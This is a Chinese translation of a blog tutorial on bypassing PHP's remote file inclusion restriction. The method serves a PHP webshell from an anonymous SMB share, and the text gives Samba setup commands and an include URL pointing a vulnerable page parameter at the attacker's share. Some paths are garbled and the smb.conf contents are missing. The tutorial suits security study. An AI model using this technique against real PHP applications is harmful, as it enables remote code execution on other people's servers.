譯文聲明

本文是翻譯文章，文章原作者mannulinux，文章來源：mannulinux.org?
原文地址：http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html

譯文僅供參考，具體內容表達以及含義原文為準

簡介

在這篇文章中，我分享一下PHP程序中的遠程文件包含漏洞，它經常會在文件包含中被利用。盡管PHP環境已經配置了禁止從遠程的HTTP/FTP URL包含文件，但我將分享如何繞過遠程文件包含的限制。

PHP and SMB 共享文件訪問權限

在PHP配置文件中，默認將allow_url_include設置為Off，來限制PHP去加載遠程的HTTP/FTP文件，這也有效的防御了遠程文件包含攻擊。盡管PHP設置了allow_url_include和allow_url_fopen為Off,但是沒有阻止下載SMB URL。

攻擊場景

當存在漏洞的PHP應用程序從攻擊者控制的SMB共享機器上下載PHP webshell時，SMB共享機器應該允許其訪問該文件。攻擊者應該設置SMB服務器可以匿名訪問。因此，一旦存在漏洞的應用程序去從SMB共享機器上下載PHP webshell時，SMB服務器不用判斷任何身份，存在漏洞的程序就可以包含這個webshell。

讓我們開始，首先在PHP的配置文件php.ini中禁止 “allow_url_fopen” 和”allow_url_include”，稍后配置SMB服務器可以匿名訪問。一旦SMB共享設置好，就可以實施攻擊。

PHP 環境配置

存在漏洞的機器已經設置”allow_url_fopen”和”allow_url_include” 為Off,下面的截圖顯示當前的PHP版本為5.5.11。

在此之前，我們要去訪問遠程的HTTP服務器上的webshell時，確保PHP禁止了遠程文件包含。

應用程序顯示報錯，當我從遠程主機上測試包含PHP webshell時，遠程文件包含沒成功。

配置 SAMBA 服務器為匿名訪問

使用以下命令去安裝SAMBA服務器。

apt-get install samba

創建SMB 共享目錄 (比如我的 /var/www/html/pub/)

mkdir /var/www/html/pub/

配置新創建的SMB共享目錄的權限：

chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/

運行下面的命令來刪除SAMBA 服務器的配置文件內容。

echo > /etc/samba/smb.conf

把下面的內容寫在/etc/samba/smb.conf里面。

重啟SAMBA服務器，讓配置文件?/etc/samba/smb.conf生效。

一旦SAMBA 服務器重啟成功，嘗試去訪問SMB共享文件，確認SAMBA 服務器沒有設置訪問權限。在我的測試中，SAMBA服務器的IP是192.168.0.3，在Windows 文件瀏覽中去訪問SMB共享文件，如下圖。

\192.168.0.3

在SMB共享中放置PHP webshell

真棒。SMB共享目錄是可以訪問的，ica文件是存在的。

在目錄/var/www/html/pub中放置php webshell，這是SMB共享指令ica目錄。

一旦在SMB共享目錄中放置了PHP shell，使用windows 文件瀏覽訪問SMB的共享目錄ica.

\192.168.0.3ica

你會看到PHP shell在SMB 共享目錄里面。我的是box.php

文件包含攻擊

使用存在遠程文件包含的PHP應用程序去訪問這個SMB共享PHP shell的鏈接。

http://vulnerable_application/page.php？page=\192.168.0.3icabox.php

可以看到，存在PHP文件包含的應用程序從SMB’共享文件中獲取web shell，并在機器上執行。我們已經繞過了限制并包含了托管在遠程機器上的webshell。

總結

以上是生活随笔為你收集整理的php 创建目录_使用SMB绕过PHP远程文件包含限制的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。